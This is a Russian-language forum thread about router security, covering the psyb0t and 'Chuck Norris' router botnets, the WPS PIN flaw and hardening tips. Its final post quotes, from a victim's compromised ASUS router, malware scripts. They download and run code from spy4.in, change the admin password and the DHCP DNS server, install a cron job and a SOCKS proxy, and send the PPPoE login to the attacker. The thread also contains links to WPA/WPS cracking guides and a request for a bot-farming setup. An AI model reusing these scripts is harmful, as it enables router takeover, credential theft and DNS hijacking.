PDA

Bekijk de volledige versie : Внимание! Безопасность Linux-based MIPSel роутеров!



ABATAPA
24-03-2009, 14:14
Появилась информация о появлении червя, атакующего роутеры, DSL-модемы с архитектурой mipsel и под управлением Linux.

Как его описывают тут (http://www.linux.org.ru/view-message.jsp?msgid=3583539):


* это — первый ботнетовый червь, поражающий роутеры и DSL-модемы;
* содержит шеллкод для многих устройств на базе mipsel;
* не нацелен на ПК или серверы;
* использует множество техник, включая брутфорсовый подбор username:password;
* собирает пароли, передаваемые по сети;
* может сканировать сеть на предмет уязвимых серверов с phpMyAdmin и MySQL.

Уязвимы Linux-устройства на базе mipsel, с открытым web-интерфейсом, telnetd или sshd в DMZ, со слабыми паролями.

Как пишут на http://dronebl.org/blog/8:


You are only vulnerable if:

* Your device is a mipsel device.
* Your device has telnet, SSH or web-based interfaces available to the WAN
* Your username and password combinations are weak, OR the daemons that your firmware uses are exploitable.


В англоязычной части форума уже проскакивало здесь (http://wl500g.info/showthread.php?t=19009).

Уделяйте внимание настройкам ваших маршрутизаторов, стойкости паролей, настройкам firewall, доступности вашего маршрутизатора извне!

В большинстве случаев зараженные роутеры "излечиваются" перезагрузкой.

Less
24-03-2009, 16:07
... настройкам firewall, доступности вашего маршрутизатора извне!

Хотел бы я на него посмотреть :rolleyes:
А то что много ботов ломится на порты 22,23, 80, 443... так
iptables -I INPUT -i $WAN_IF .... -j LOG_DROP или просто DROP :D

ABATAPA
25-03-2009, 05:28
А то что много ботов ломится на порты 22,23, 80, 443... так
iptables -I INPUT -i $WAN_IF .... -j LOG_DROP или просто DROP :D

Это далеко не у всех так. И тем более не у всех закрыт доступ из MAN.

Ну, вот и еще новости:


Злоумышленникам удалось доказать возможность создания рабочих ботнет сетей на платформах отличных от Windows, захватив управление над примерно 100 тысячами ADSL мини-маршрутизаторов и задействовав их в качестве единой ботнет сети для проведения DDoS атак и рассылки спама.


Источники:
http://www.opennet.ru/opennews/art.shtml?num=20918

http://www.eweek.com/c/a/Security/The-First-Linux-Botnet-626424/

al37919
25-03-2009, 05:42
Основной целью атаки являются ADSL модемы Netcomm NB5, работающие под управлением Linux.

udhcpc.env представляет собой сжатый универсальный исполняемый код (33 Кб), откомпилированный для платформы MIPSel

Однако, похоже, этот бот не угрожает конкретно нам, т.к. в этом случае его пришлось бы компилить с использованием тулчейна олео, или Олега. ИМХО любой бинарный код не запустится на любом устройстве mipsel.

В общем, если держать наружу открытым только ssh, иметь нормальный пароль, а к остальным сервисам ходить через туннели, то можно спать спокойно. Для еще большего покоя на ssh можно повесить bruteforce защиту с помощью ipt_recent

А про то, что веб морду наружу не надо открывать вообще, а особенно с доступом admin/admin --- про это уже не раз говорено. Тут можно проблему и без ботов поиметь.

ABATAPA
25-03-2009, 06:34
Однако, похоже, этот бот не угрожает конкретно нам, т.к. в этом случае его пришлось бы компилить с использованием тулчейна олео, или Олега. ИМХО любой бинарный код не запустится на любом устройстве mipsel.

Не обязательно.
На любом - нет, на многих - запустится статически слинкованный.




В общем, если держать наружу открытым только ssh, иметь нормальный пароль, а к остальным сервисам ходить через туннели, то можно спать спокойно.

Так о том и речь, разве нет?



А про то, что веб морду наружу не надо открывать вообще, а особенно с доступом admin/admin --- про это уже не раз говорено. Тут можно проблему и без ботов поиметь.

То, что говорено где-то кем-то - ничего для многих производителей (да и пользователей) не изменило.
По-прежнему можно найти массу модемов с открытым управлением снаружи и паролями по умолчанию. Что и использовано тут.

SuxZ
25-03-2009, 08:02
Вирусы теперь могут проникать в BIOS

Конец марта в этом году ознаменовался двумя важными новостями – во-первых, найден способ помещения вредоносного кода в память BIOS, а во-вторых, обнаружено массовое заражение домашних маршрутизаторов червем под названием «psyb0t», который превращает роутер в компонент ботнет-сети.



Заражение микросхемы BIOS в компьютере до сих пор считалось чем-то из области фантастики. Именно BIOS (Basic Input/Output System) отвечает за сохранение конфигурации системы в неизменном виде, а также за исполнение базовых функций ввода и вывода информации. Тем не менее, два аргентинских специалиста, Альфредо Ортега (Alfredo Ortega) и Анибал Сакко (Anibal Sacco) из компании Core Security Technologies показали на конференции по информационной безопасности CanSecWest успешное введение в BIOS специальной программы для удаленного управления, или руткита (rootkit). В частности, им удалось на глазах зрителей заразить компьютеры с операционными системами Windows и OpenBSD, а также виртуальную машину OpenBSD на платформе VMware Player.

Хотя для заражения BIOS по методу Ортеги и Сакко необходимо заранее скомпрометировать машину или иметь физический доступ к машине, последствия такого заражения оказались просто ужасными – даже после полного стирания информации на жестком диске, перепрошивки BIOS и переустановки операционной системы при следующей перезагрузке машина вновь оказывается заражена. Подробнее об атаке на BIOS можно прочитать в блоге ThreatPost.

Еще одну серьезную опасность обнаружили администраторы сайта DroneBL, который занимается мониторингом IP-адресов, служащих источником различных сетевых атак. Примерно две недели назад на сайт была совершена DDoS-атака (Distributed Denial of Service – распределенная атака на отказ в обслуживании). При расследовании инцидента выяснилось, что атаку производили зараженные роутеры и DSL-модемы. Дальнейший анализ показал, что в Интернете появилась первая ботнет-сеть, которая базируется не на ПК и серверах, а на сетевом оборудовании домашнего уровня. Эта вредоносная сеть вместе с червем, распространяющим заразу, получила название «psyb0t».

Механизм заражения «psyb0t» оказался довольно необычным. Заражению подвержены любые устройства с маршрутизацией пакетов на базе операционной системы Linux Mipsel, снабженные административным интерфейсом, либо открывающие доступ через службы sshd или telnetd для защищенной зоны DMZ, если у них заданы слабые сочетания имени пользователя и пароля (включая устройства openwrt/dd-wrt). Червь «psyb0t» использует специальный алгоритм подбора имен пользователя и паролей, а также несколько стратегий для перехвата управления устройством.

После заражения червь «psyb0t» встраивает фрагмент вредоносного кода в операционную систему устройства – в состав червя входят варианты кода для нескольких версий системы Mipsel, они загружаются с центрального сервера злоумышленников. Затем червь закрывает конечному пользователю доступ к устройству по telnet, sshd и через веб-интерфейс, а сам начинает исследовать все проходящие через устройство пакеты, выуживая из них различные имена и пароли. Также червь пересылает своим владельцам информацию о наличии в локальной сети серверов с уязвимыми конфигурациями службы phpMyAdmin и СУБД MySQL. По данным DroneBL, уже сейчас в ботнет-сети насчитывается более 100 тысяч активных зараженных устройств, используемых для похищения частной информации и проведения крупномасштабных DDoS-атак. Особую опасность, по мнению первооткрывателей, представляет то, что большинство домашних пользователей, скорее всего, не смогут заметить присутствия червя «psyb0t» в своей сети.

Подробное описание ботнета и червя «psyb0t» можно найти в блоге DroneBL.

По материалам zdnet.com и theregister.co.uk.

Оригинал статьи тут (http://soft.mail.ru/pressrl_page.php?id=33120)

Вопрос: с безопасностью наших Asus все в полном порядке?

Dao_Dezi
25-03-2009, 08:58
Вопрос: с безопасностью наших Asus все в полном порядке?

От хозяина Асуса зависит. Как и в большинстве других случаев. А вообще про это отдельный топ уже есть.

avk
25-03-2009, 09:06
А вообще про это отдельный топ уже есть.

Перенес сюда.

tiny
25-03-2009, 21:08
Интересно, червь на bash написан?

Dao_Dezi
26-03-2009, 02:42
Судя по описанию - обычный ELF для процессоров mips. Потому и не заражает обычные компы.

Omega
15-04-2009, 03:01
Ботнет атакует: червь для Linux-based роутеров

В сети появился новый червь «psyb0t», отличительными особенностями которого являются:
это - первый ботнетовый червь, поражающий маршрутизаторы (роутеры) и DSL-модемы;
содержит шеллкод для многих устройств на базе операционной системы Linux Mipsel;
использует множество техник, включая брутфорсовый подбор username/password;
может сканировать сеть на предмет уязвимых серверов с phpMyAdmin и MySQL;
собирает пароли, передаваемые по сети;
не нацелен на ПК или серверы.
Уязвимы Linux-устройства на базе Mipsel, с открытым web -
интерфейсом, telnetd или sshd в DMZ, со слабыми паролями.

http://www.linux.org.ru/view-message.jsp?msgid=3583539


Вирусы теперь могут проникать в BIOS и роутеры !


Конец марта в этом году ознаменовался двумя важными новостями – во-первых, найден способ помещения
вредоносного кода в память BIOS, а во-вторых, обнаружено массовое заражение домашних маршрутизаторов
червем под названием «psyb0t», который превращает роутер в компонент ботнет-сети.

Еще одну серьезную опасность обнаружили администраторы сайта DroneBL, который занимается мониторингом
IP-адресов, служащих источником различных сетевых атак. Примерно две недели назад на сайт была совершена
DDoS-атака (Distributed Denial of Service – распределенная атака на отказ в обслуживании). При расследовании
инцидента выяснилось, что атаку производили зараженные роутеры и DSL-модемы. Дальнейший анализ показал,
что в Интернете появилась первая ботнет-сеть, которая базируется не на ПК и серверах, а на сетевом оборудовании
домашнего уровня. Эта вредоносная сеть вместе с червем, распространяющим заразу, получила название «psyb0t».

Механизм заражения «psyb0t» оказался довольно необычным. Заражению подвержены любые устройства с
маршрутизацией пакетов на базе операционной системы Linux Mipsel, снабженные административным интерфейсом,
либо открывающие доступ через службы sshd или telnetd для защищенной зоны DMZ, если у них заданы слабые
сочетания имени пользователя и пароля (включая устройства openwrt/dd-wrt). Червь «psyb0t» использует специальный
алгоритм подбора имен пользователя и паролей, а также несколько стратегий для перехвата управления устройством.

После заражения червь «psyb0t» встраивает фрагмент вредоносного кода в операционную систему устройства
– в состав червя входят варианты кода для нескольких версий системы Mipsel, они загружаются с центрального
сервера злоумышленников. Затем червь закрывает конечному пользователю доступ к устройству по telnet, sshd
и через веб-интерфейс, а сам начинает исследовать все проходящие через устройство пакеты, выуживая из них
различные имена и пароли. Также червь пересылает своим владельцам информацию о наличии в локальной сети
серверов с уязвимыми конфигурациями службы phpMyAdmin и СУБД MySQL. По данным DroneBL, уже сейчас в ботнет-
сети насчитывается более 100 тысяч активных зараженных устройств, используемых для похищения частной информации
и проведения крупномасштабных DDoS-атак. Особую опасность, по мнению первооткрывателей, представляет то, что
большинство домашних пользователей, скорее всего, не смогут заметить присутствия червя «psyb0t» в своей сети.

Подробное описание ботнета и червя «psyb0t» можно найти в блоге DroneBL (http://dronebl.org/blog/8).
По материалам zdnet.com и theregister.co.uk.
Источник: http://teh-podderzhka.3dn.ru/news/2009-03-25-23

Длинк уже собирается вводить капчу ... :D

Вирус psyb0t и pоутеры D-Link

В данный момент не было выявлено заражения роутеров D-Link данным вирусом.

Для предотвращения заражением вирусом, следует принять следующие меры:

Перезагрузить.
Задать сложный стойкий пароль 6-10 символов, желательно использовать спец. символы, кроме / \ ; * ? " | < >
Проверить устройство на открытый порт 23 вы можете тут: https://www.grc.com/x/portprobe=23
Проверить устройство на открытые порты вы можете тут: https://www.grc.com/x/ne.dll?bh0bkyd2
В будущем, вероятно, появятся вирусы, способные подбирать пароль, в связи с этим
планируется введение подтверждения пароля при помощи графической картинки.
http://forum.dlink.ru/viewtopic.php?t=89214

Скоро напишут виры для клавы и мыши ... :cool:

З.Ы. Да, только сейчас заметил, что аналогичная тема уже была ...
Попрошу уважаемых модераторов слить посты в тему ув. ABATAPA (http://wl500g.info/showthread.php?t=19014) :)

2 ABATAPA Искал, но не расширенным поиском ...
Нужно ставить "Tags" для быстрого поиска топиков ... ;)

midya
15-04-2009, 08:14
Похоже у Нас заразился один роутер сам проявлял сетевую активность за ночи нагнал трафика на 700 метров, это был D-link 320 со 2-ой прошивкой от lly перезагрузка почему-то не помогла, кнопка сброса не работала на сброс (правда я её в рабочем состоянии не проверял может она и так не работает) пришлось сбросить через веб интерфейс и заново прописать то что там нужно по инструкции, сами виноваты пароль был элементарный 414 =((( Не ставьте простых паролей !!!

MrGalaxy
15-04-2009, 18:36
на ssh можно повесить bruteforce защиту с помощью ipt_recent
Подробнее про это, пожалуйста.

al37919
15-04-2009, 18:46
Подробнее про это, пожалуйста.
подробнее --- пожалуйста: кнопка ПОИСК наверху страницы. Либо ставьте 1.9.2.7-d --- там эта защита включается в вебе.

MrGalaxy
15-04-2009, 19:45
Господа!
Кто может рассказать про ipt_recent?
Как его правильно ставить на роутер и как прописывать потом правила?

vectorm
15-04-2009, 20:06
Господа!
Кто может рассказать про ipt_recent?
Как его правильно ставить на роутер и как прописывать потом правила?
http://www.opennet.ru/prog/info/2534.shtml - это ответ на 1 вопрос.

bagira
08-06-2009, 09:16
день добрый.
Скажите у меня прошивка последния официальная...
Я не нашла где отключить доступ по телнет и по SSH

это в каких мне настройках искать....

Я провела тест роутера на порты
вот что получилось
22-23 stealthed
80 stealthed
21 closed

вроде бы все хорошо, но как мне 21 порт не закрыть , а просто сделать так же невидимым....

извините что задаю может глупые вопросы, но даже мне хочется защититься от заразы...

Dayran
09-06-2009, 14:50
а может кто-нибудь носом тыкнуть, где про настройки безопасности рассказывается? Поиском ничего конкретного не нашёл.

wizeman
09-06-2009, 16:11
день добрый.
вроде бы все хорошо, но как мне 21 порт не закрыть , а просто сделать так же невидимым....


В настройках: USB Application - FTP Server - Enable FTP Server: Yes, LAN Only
Хотя в таком состоянии он и должен быть закрытым.

Может на это влияет настройка: Enable Firewall?

bagira
09-06-2009, 16:24
В настройках: USB Application - FTP Server - Enable FTP Server: Yes, LAN Only
Хотя в таком состоянии он и должен быть закрытым.

Может на это влияет настройка: Enable Firewall?



У меня официальная прошивка 1.9.7.7 , такой опции у меня нет FTP Server

USB Application - Basic Config

Enable Download Master? No
Enable Download Share? No
Default port range for Download Share: From To
Default Seed Time for BT(in hour):
Enable Media Server? no

DemonGloom
09-06-2009, 16:44
ИМХО, светить Telnet наружу нельзя, а доступ по ssh разрешать только по максимальной длине ключа...
Вопрос знатокам: 1024 бита у нас максимум или можно больше?

Mr.Virtus
16-11-2009, 17:55
Добрый вечер.
Пользуюсь данным маршрутизатором почти месяц и нареканий нет, но сейчас возникла необходимость установить на него некое приложение (бот для контакта, который будет в сети совершать некую последовательность действий),
которое должно работать круглосуточно, даже при выключенном компьютере.
Если такое возможно, пожалуйста расскажите как реализовать это, заранее спасибо.

p.s. прошивка вроде последняя, официальная

ABATAPA
16-11-2009, 18:36
(бот для контакта, который будет в сети совершать некую последовательность действий),


Спамеры? "Фермеры"? :)
Есть perl, есть php.
Пишите - и вперед.

vectorm
16-11-2009, 18:37
Добрый вечер.
Пользуюсь данным маршрутизатором почти месяц и нареканий нет, но сейчас возникла необходимость установить на него некое приложение (бот для контакта, который будет в сети совершать некую последовательность действий),
которое должно работать круглосуточно, даже при выключенном компьютере.
Если такое возможно, пожалуйста расскажите как реализовать это, заранее спасибо.

p.s. прошивка вроде последняя, официальная
С этой прошивкой можете о планах забыть.

Mr.Virtus
16-11-2009, 19:53
Спамеры? "Фермеры"? :)


скорее второе)



Есть perl, есть php.

эмм.. не совсем понял что сие значит..



С этой прошивкой можете о планах забыть.

а какую нужно поставить чтобы реализовать свои планы? и как тогда себя дальше с ней вести?:confused:

Mashiro-sama
17-11-2009, 06:39
эмм.. не совсем понял что сие значит..

Это языки программирования. Которые можно поставить на роутер. Соответственно, пишете своего бота на perl, или php, или вообще на c++, и запускаете на роутере... Ну или ищете в сети готового бота для себя на php или perl, допиливаете при необходимости руками под роутер ;), и запускаете.

vectorm
17-11-2009, 09:31
а какую нужно поставить чтобы реализовать свои планы? и как тогда себя дальше с ней вести?:confused:
Любую, из обсуждающихся здесь.
Как вести - читать в прикрепленных темах и поиске ;)

Mr.Virtus
17-11-2009, 12:46
Это языки программирования. Которые можно поставить на роутер. Соответственно, пишете своего бота на perl, или php, или вообще на c++, и запускаете на роутере... Ну или ищете в сети готового бота для себя на php или perl, допиливаете при необходимости руками под роутер ;), и запускаете.

да, отлилный вариант, щас пойду только php вычу и сразу напишу (хоть я и знаю немного с++, но как бота на нём написать хз)



Любую, из обсуждающихся здесь.
Как вести - читать в прикрепленных темах и поиске ;)

супер, как всегда чёткий, и грамотный ответ, а главное помогло то как

p.s. можно было даже лучше написать, например:
- читай форум, там всё есть
или
- юзай гугл

vectorm
17-11-2009, 13:17
сейчас возникла необходимость установить на него некое приложение (бот для контакта, который будет в сети совершать некую последовательность действий)
Алаверды ;)
Четкий грамотный вопрос ;)

Напишите четкие требования, уточните на чем бот, это уже написанное ПО, или только планируемое, и т.п.

Omega
17-11-2009, 14:34
да, отлилный вариант, щас пойду только php вычу и сразу напишу
(хоть я и знаю немного с++, но как бота на нём написать хз)
супер, как всегда чёткий, и грамотный ответ, а главное помогло то как
p.s. можно было даже лучше написать, например:
- читай форум, там всё есть
или
- юзай гугл
LOL :D Ещё один кулхацкер ... :)
Ботоводство никаким боком не относится к
приорететной специфике данного форума ... :cool:

З.Ы. Идите на xakep.ru ... ;)

ABATAPA
19-11-2009, 11:47
д
супер, как всегда чёткий, и грамотный ответ, а главное помогло то как



Каков вопрос - таков ответ. Можно подумать, в Вашем вопросе была хоть толика конкретики.
Ответ же содержал достаточную при начальных условиях информацию. То, что что-то не можете сделать Вы лично, не значит, что это вообще невозможно.

SancheSZ
03-12-2009, 20:45
Подниму тему...

Походу взломали мой wl500gp v1 ...
Прошивка Олега последняя (но не Энтузиастов)

Dec 1 01:03:22 passwd[16959]: password for `root' changed by user `root'
Dec 1 01:03:22 dropbear[16967]: password auth succeeded for 'root' from ::ffff:66.221.94.226:4489

Пароль - 8 случайных букв в разном регистре, наружу открыт только ssh (телнет и веб-интерфейс наружу закрыты).

Заметил только сейчас, когда не смог залогиниться по telnet\ssh
в веб-интерфейсе пароль остался.

Думаю, что ребут решит проблему с логином через телнет (passwd восстановится из флеша).

P.S.: что интересно - перед сменой пароля и успешным логином судя по логам не было попыток брутфорса (последняя попытка брутфорса - за сутки с лишним до взлома).
Еще странно, что судя по логу сначала произошла смена пароля, а только потом - логин (т.е. это не брутфорс???)

Power
03-12-2009, 21:17
Пароль - 8 случайных букв в разном регистре, наружу открыт только ssh (телнет и веб-интерфейс наружу закрыты).


Вы абсолютно уверены, что веб-интерфейс наружу закрыт? Покажите вывод iptables-save.
Есть ещё такие варианты: 1) у вас на компе вирус и он стырил пароль; 2) вы выложили файл с сохранёнными настройками роутера на видное место.

SancheSZ
03-12-2009, 21:41
Вы абсолютно уверены, что веб-интерфейс наружу закрыт? Покажите вывод iptables-save.
Есть ещё такие варианты: 1) у вас на компе вирус и он стырил пароль; 2) вы выложили файл с сохранёнными настройками роутера на видное место.

Уверен. У меня на 80 (соответственно и снаружи и изнутри) порту крутится веб-морда для торрента. А веб-морда переведена на другой порт. Все порты (в т.ч. и этот другой) проброшены на мою внутреннюю машину (DMZ). Соответственно даже зная порт снаружи к веб-морде подключиться нельзя.

P.S.: вообще брутфорсят меня часто, но я как-то на это особо внимания не обращал (кроме пухнущих логов, которые на винт сбрасываются, - проблем никаких).
Да и щас брутфрос последний (окончившийся ничем был за сутки до этого и с других адресов)

AndreyUA
03-12-2009, 22:41
Тоже была такая же хренотеть как у SancheSZ. Обратил внимание на то что не могу зайти по телнет и SSH Зашел на вебинтерфейс, в логах кусок кода какой-то страницы c JS и прочей лабудой. Подумал что глюк роутера и перепрошил его. Перезагрузка не помогала, т.к. я хранил в .files .passwd

vectorm
04-12-2009, 17:25
Уверен. У меня на 80 (соответственно и снаружи и изнутри) порту крутится веб-морда для торрента. А веб-морда переведена на другой порт. Все порты (в т.ч. и этот другой) проброшены на мою внутреннюю машину (DMZ). Соответственно даже зная порт снаружи к веб-морде подключиться нельзя.

P.S.: вообще брутфорсят меня часто, но я как-то на это особо внимания не обращал (кроме пухнущих логов, которые на винт сбрасываются, - проблем никаких).
Да и щас брутфрос последний (окончившийся ничем был за сутки до этого и с других адресов)
Чудес не бывает. Самба в локальную сеть не открыта?
Порт SSH 22 ? Сменить не пробовали? Перевесив на любой порт выше 1024 Вы себя от головной боли избавите надолго. Хацкеры в своем большинстве не умеют пользоваться нормальными сканирующими утилитами.

vectorm
04-12-2009, 17:28
Тоже была такая же хренотеть как у SancheSZ. Обратил внимание на то что не могу зайти по телнет и SSH Зашел на вебинтерфейс, в логах кусок кода какой-то страницы c JS и прочей лабудой. Подумал что глюк роутера и перепрошил его. Перезагрузка не помогала, т.к. я хранил в .files .passwd
Делаем бекап настроек заранее.
А passwd можно попробовать через веб интерфейс удалить, через System command.

ABATAPA
23-02-2010, 20:33
Итак, новый виток.

22.02.2010 20:32 Обнаружен новый ботнет из незащищенных маршрутизаторов с прошивкой на базе Linux

Чешские исследователи в области безопасности компьютерных систем сообщили об обнаружении нового сетевого червя, получившего название "Чак Норрис" и состоящего из незащищенных надлежащим образом мини-маршрутизаторов, DSL-модемов и спутниковых TV-ресиверов, работающих на базе прошивок, основанных на Linux. Как правило инфицирование маршрутизаторов происходит из-за выставления администратором ненадежного пароля, подбираемого путем несложного перебора типовых вариантов, или сохранения пароля, заданного по умолчанию. Также заражение может происходить через эксплуатацию обнаруженной в январе уязвимости в маршрутизаторах D-Link.

http://www.opennet.ru/opennews/art.shtml?num=25528

Omega
15-01-2012, 14:08
Новая уязвимость в WPS позволяет быстрее угадывать PIN-код маршрутизатора

Недавно обнаруженная уязвимость в стандарте Wi-Fi Protected Setup (WPS) сокращает количество попыток, которые требуются хакеру, пытающемуся брутфорсить PIN-код процесса установки беспроводного роутера. В результате ошибки слишком много информации о PIN-коде возвращается атакующему, а сам PIN-код становится слабее, что негативно влияет на защиту миллионов Wi-Fi маршрутизаторов и точек доступа. Исследователь безопасности Стефан Вибок обнаружил эту уязвимость и доложил о ней в US-CERT.

От проблемы страдают продукты ряда производителей, включая D-Link, Netgear, Linksys и Buffalo. "Я обнаружил несколько очень неудачных проектных решений, которые могут способствовать эффективной брутфорс атаке, нарушая, таким образом, безопасность буквально всех Wi-Fi маршрутизаторов с поддержкой WPS. А поскольку большинство современных моделей поддерживают WPS по умолчанию, то пострадать могут миллионы устройств по всему миру", - сказал Вибок.

"Одна попытка аутентификации занимает от 0.5 до 3 секунд. Замечено, что больше всего времени уходит на вычисление общего ключа Диффи – Хеллмана (это должно быть сделано перед генерацией M3). Требуемое время может быть сокращено за счет выбора очень малого секретного числа Диффи-Хеллмана, в результате чего вырабатывается небольшой публичный ключ, а вычислить общий ключ со стороны точки доступа становится проще", - добавил он.

"Если проверка подлинности PIN-кода завершилась неудачно, точка доступа посылает сообщение EAP-NACK назад клиенту. Эти сообщения пересылаются таким образом, что хакеру удается определить, является ли первая половина PIN-кода верной. Последняя цифра уже известна, так как она является контрольной суммой PIN-кода. Все это значительно сокращает количество попыток, требуемых для успешного брутфорса PIN-кода. Количество попыток сокращается со 108 до 103+104, что в сумме дает 11 000 попыток", - сказал консультант US-CERT.

Вибок разработал инструмент Python для брутфорса PIN-кодов. Он его еще не выпустил, но сказал, что сделает это когда приведет в порядок код. Ни один из подверженных уязвимости производителей не выпустил исправления или обходного пути для бага, но в своей статье Вибок написал, что лучшим способом смягчения на данный момент является отключение WPS. Так же способна помочь установка более длительного времени блокировки в результате многочисленных неудачных попыток аутентификации.

http://www.xakep.ru/post/58116/ :cool:

checat
24-01-2012, 16:54
Новая уязвимость в WPS позволяет быстрее угадывать PIN-код маршрутизатора
А как с этим обстоит дело в прошивке для wl500gp v2? А то я пару лет не обновлял ничего, а тут вот прочитал про это.

Vampik
24-01-2012, 17:39
А как с этим обстоит дело в прошивке для wl500gp v2? А то я пару лет не обновлял ничего, а тут вот прочитал про это.

В прошивке от Олега и энтузиастов вообще нет поддержки WPS, поэтому даже взламывать нечего ;)

Omega
08-04-2012, 13:51
Official Announcement: Avoiding Brute Force Attacks Via The WPS Protocol

Singapore (March 29, 2012)
For ASUS wireless and networking products, security is always the first priority.

In response to US CERT report on the vulnerability of the WPS protocol (http://www.kb.cert.org/vuls/id/723755), ASUS is now working
with the Wi-Fi Alliance to develop a firmware update capable of deterring and protecting from
such attacks. We will keep registered users informed as to the availability of this firmware
update, and will post it on our support site, as well.

To enhance security, most ASUS routers automatically disable WPS 2 minutes after setup.
Users can also manually disable WPS-PIN (the WPS push buttonwill still work) through router
setup to avoid possible concerns. Follow these steps to do so:

Launch your browser and enter 192.168.1.1 in the address bar. Then use admin
for both username and password to log-in to the router user interface.
Go to the Advanced Setup menu, and select Wireless Settings.
Under WPS settings, select OFF for Enable WPS. **
Click Apply to save settings.
** The Enable WPS button is available currently on RT-N66U only. More models
adopting Asus new firmware, Asus WRT, will also incorporate this function.

http://i146.photobucket.com/albums/r254/maylyn22/ASUS%20RT-N66U/ASUSRT-N66UAvoidingBruteForceAttacksViaTheWPSProtocol.png

http://www.campuselites.com/2012/03/29/official-announcement-in-response-to-us-certs-report-on-the-vulnerability-of-the-wps-protocol/ :cool:

pux
08-04-2012, 14:42
Отцы, а нельзя ли завести отдельную тему (или эту переименовать) и постить в нее только то, что связано с возможными проблемами с безопасностью на роутерах с данной прошивкой (+ софтом из основных репозитариев)? У вас фактически полноценный дистрибутив, в нем куча кода, но как администраторам "коробочек" узнавать о проблемах с безопасностью? ИМХО самое простое решение -- тема для подписки, с минимальным трафиком.

TReX
08-04-2012, 22:16
Отцы, а нельзя ли завести отдельную тему (или эту переименовать) и постить в нее только то, что связано с возможными проблемами с безопасностью на роутерах с данной прошивкой (+ софтом из основных репозитариев)? У вас фактически полноценный дистрибутив, в нем куча кода, но как администраторам "коробочек" узнавать о проблемах с безопасностью? ИМХО самое простое решение -- тема для подписки, с минимальным трафиком.

А у нас есть проблемы с безопасностью? И нельзя ли расшифровать понятие "администратор домашнего роутера" )

YuriM
15-05-2012, 15:06
Процесс взлома описан здесь: http://habrahabr.ru/company/xakep/blog/143834/

Насколько мне известно, в оригинальной прошивке Asus wl500gpv2 есть включение/отключение WPS. В олеговской не нашел. Оно вообще там работает?

vectorm
15-05-2012, 15:46
Процесс взлома описан здесь: http://habrahabr.ru/company/xakep/blog/143834/

Насколько мне известно, в оригинальной прошивке Asus wl500gpv2 есть включение/отключение WPS. В олеговской не нашел. Оно вообще там работает?
В прошивках Олеги и Энтузиастов WPS нет как класса, соответственно, ломать нечего.
Поскольку обсуждать нечего - перенёс сюда.

TReX
15-05-2012, 16:04
В прошивках Олеги и Энтузиастов WPS нет как класса, соответственно, ломать нечего.
Поскольку обсуждать нечего - перенёс сюда.

ААА можно немножко пофлудить?:cool: Раз уж подняли тут эту тему, то - Подбор паролей к WPA/WPA2 с использованием видеокарты http://habrahabr.ru/post/122553/ - естественно работает вне зависимости от того какая прошивка установленна на роутере) Используется как обсчет на видеокарте так и сокращение необходимого диапазона просчета с использованием "как это по русски" - радужных таблиц )

Деклаймер - Естественно применяется только для нахождения забытого пароля к своей точке )

Pablo Escobar
15-05-2012, 17:49
коллеги, каюсь, помнил, но забыл.
как посмотреть/поменять пароль рута из веб-морды?

спасибо.

YuriM
15-05-2012, 20:55
В связи найденной уязвимостью в wps, хочу узнать, работает ли он в прошивке "от олега". В оригинальной прошивке вроде есть и можно отключать.
Роутер asus wl500gpv2.

MercuryV
15-05-2012, 21:33
В прошивках Олеги и Энтузиастов WPS нет как класса, соответственно, ломать нечего.
Поскольку обсуждать нечего - перенёс сюда.
топикстартер этого не увидел и всё еще волнуется (http://wl500g.info/showthread.php?19014-%C2%CD%C8%CC%C0%CD%C8%C5-%F7%E5%F0%E2%FC-%E4%EB%FF-Linux-based-mipsel-%F0%EE%F3%F2%E5%F0%EE%E2!&p=250493#post250493) :)

ABATAPA
16-05-2012, 10:09
Подбор паролей к WPA/WPA2 с использованием видеокарты http://habrahabr.ru/post/122553/ - естественно работает вне зависимости от того какая прошивка установленна на роутере) Используется как обсчет на видеокарте так и сокращение необходимого диапазона просчета с использованием "как это по русски" - радужных таблиц )

Тогда и я добавлю: взлом WPS (http://habrahabr.ru/company/xakep/blog/143834).

Сюда же: "Уголовный кодекс РФ (УК РФ). Статья 272. Неправомерный доступ к компьютерной информации. (http://www.consultant.ru/popular/ukrf/10_38.html#p4850)"


коллеги, каюсь, помнил, но забыл.
как посмотреть/поменять пароль рута из веб-морды?

Как поменять из веб-морды? "System Setup" —> "Change Password"
Из консоли посмотреть:
nvram show | grep http_passwd

Visionary
01-08-2012, 17:40
Имею wl500gpv2 уже 3 года. Изучил полностью. Недавно перепрошил на последнюю прошивку от энтузиастов.
были некоторые проблемы с samba (нет доступа с ipad из программы buzz player). поэтому отключил iptables (iptables -P FORWARD ACCEPT
iptables -P INPUT ACCEPT).
так и оставил. сегодня нужно было изменить некоторые скрипты. обратил внимание, что в /tmp/local/sbin много файлов. прибил лишние процессы и начал смотреть...
содержимое post-firewall:

#!/bin/sh

cd /usr/local/sbin
wget -q http://spy4.in/data/tofire
chmod +x tofire
sh tofire
rm -rf tofire

добавился файл tocron:

#!/bin/sh
cd /usr/local/sbin && wget -q http://spy4.in/data/todo && chmod +x todo && ./todo && rm -rf todo

исполняемые 3proxy, proxy, udppm, socks и еще пару

содержимое http://spy4.in/data/todo:


#!/bin/sh

rip=`nvram get wan0_ipaddr`
ilogin=`nvram get wan0_pppoe_username`
sport=`cat /usr/local/etc/sport`
sleep ` tr -cd 1-9 </dev/urandom | head -c 2`s
wget -q -O ttt http://spy4.in/g.php?rname=$ilogin\&rip=$rip\&sport=$sport
rm -rf ttt


содержимое http://spy4.in/data/tofire:


#!/bin/sh
nvram set dhcp_dns1_x=217.12.219.20
nvram set http_passwd=qweasdOP
mount -obind /tmp/local /opt
cd /tmp/ && wget http://spy4.in/data/3.tgz && tar xvzf 3.tgz
rm -rf /tmp/3.tgz
mkdir /var/spool/cron/crontabs/ -p
mv -f /tmp/local/admin /var/spool/cron/crontabs/
chmod +x /var/spool/cron/crontabs/admin
killall crond
sleep 3
crond
crontab /var/spool/cron/crontabs/admin -u admin

SPORT=` tr -cd 1-5 </dev/urandom | head -c 5`
echo $SPORT > /usr/local/etc/sport
echo "daemon
nserver 8.8.8.8
auth none
socks -p$SPORT" > /usr/local/etc/3proxy.cfg
killall 3proxy
sleep 5
3proxy /usr/local/etc/3proxy.cfg
cd /usr/local/sbin && ./tocron



особо ничего не вытянет (ip внутренний, iptables уже вкрутил, пароль поменял).
Кто нибудь сталкивался с подобным? чем грозит как думаете? где еще чего посмотреть?

upd проворонил что в dhcp изменен dns на левый. в результате происходит попытка заражения подсоединенных устройств (перекидывает на страницы с предложением обновить браузер.)

ABATAPA
08-08-2012, 05:53
Кто нибудь сталкивался с подобным?

